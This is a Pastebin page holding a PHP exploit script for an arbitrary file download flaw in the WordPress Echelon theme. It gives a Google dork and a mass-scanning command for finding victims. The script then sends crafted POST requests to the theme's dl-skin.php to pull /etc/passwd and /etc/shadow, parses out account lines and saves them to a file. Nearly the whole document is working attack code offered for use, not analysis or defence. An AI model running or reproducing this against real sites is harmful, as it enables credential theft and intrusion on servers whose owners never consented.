Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #===============================================================================
- # NAME: Wordpress A.F.D Theme Echelon
- # TIPE: Arbitrary File Download
- # Google DORK: inurl:/wp-content/themes/echelon
- # Vendor: www.wordpress.org
- # Tested on: Linux
- # EXECUTE: php exploit.php www.alvo.com.br
- # OUTPUT: EXPLOIT_WPAFD_Echelon.txt
- # AUTOR: Cleiton Pinheiro
- # Blog: http://blog.inurl.com.br
- # Twitter: https://twitter.com/googleinurl
- # Fanpage: https://fb.com/InurlBrasil
- # GIT: https://github.com/googleinurl
- # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
- #
- #
- #------------------------------------------------------------------------------
- # Comand Exec Scanner INURLBR:
- # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
- #
- #------------------------------------------------------------------------------
- # Download Scanner INURLBR:
- # https://github.com/googleinurl/SCANNER-INURLBR
- #===============================================================================
- error_reporting(1);
- set_time_limit(0);
- ini_set('display_errors', 1);
- ini_set('max_execution_time', 0);
- ini_set('allow_url_fopen', 1);
- ob_implicit_flush(true);
- ob_end_flush();
- print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
- $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
- $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
- $config['alvo'] = $argv[1];
- $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
- function __plus() {
- ob_flush();
- flush();
- }
- function __convertUrlQuery($query) {
- $queryParts = explode('&', $query);
- $params = array();
- foreach ($queryParts as $param) {
- $item = explode('=', $param);
- $params[$item[0]] = urlencode($item[1]);
- }
- return $params;
- }
- function __request_info($curl, $config) {
- $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
- foreach ($postDados as $campo => $valor) {
- $postDados_format .= $campo . '=' . ($valor) . '&';
- }
- $postDados_format = rtrim($postDados_format, '&');
- curl_setopt($curl, CURLOPT_POST, count($postDados));
- curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
- curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
- curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
- $config['exploit']);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
- curl_setopt($curl, CURLOPT_HEADER, 1);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- $corpo = curl_exec($curl);
- $server = curl_getinfo($curl);
- $status = NULL;
- preg_match_all('(HTTP.*)', $corpo, $status['http']);
- preg_match_all('(Server:.*)', $corpo, $status['server']);
- preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
- $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
- curl_close($curl);
- unset($curl);
- return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
- }
- function main($config, $rest) {
- __plus();
- print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
- preg_match_all("(root:.*)", $rest['corpo'], $final);
- preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
- preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
- preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
- preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
- $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
- $res = NULL;
- if (preg_match("#root#i", $rest['corpo'])) {
- $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
- $res.=$config['line'] . "\n";
- foreach ($_final as $value) {
- $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
- }
- $res.=$config['line'];
- __plus();
- file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
- print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
- } else {
- print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
- }
- }
- print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
- $config['file'] = '/etc/passwd';
- $rest = __request_info($objcurl = curl_init(), $config);
- __plus();
- print $line;
- print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
- print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
- main($config, $rest);
- __plus();
- $config['file'] = '/etc/shadow';
- $rest = __request_info($objcurl = curl_init(), $config);
- __plus();
- main($config, $rest);
- __plus();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement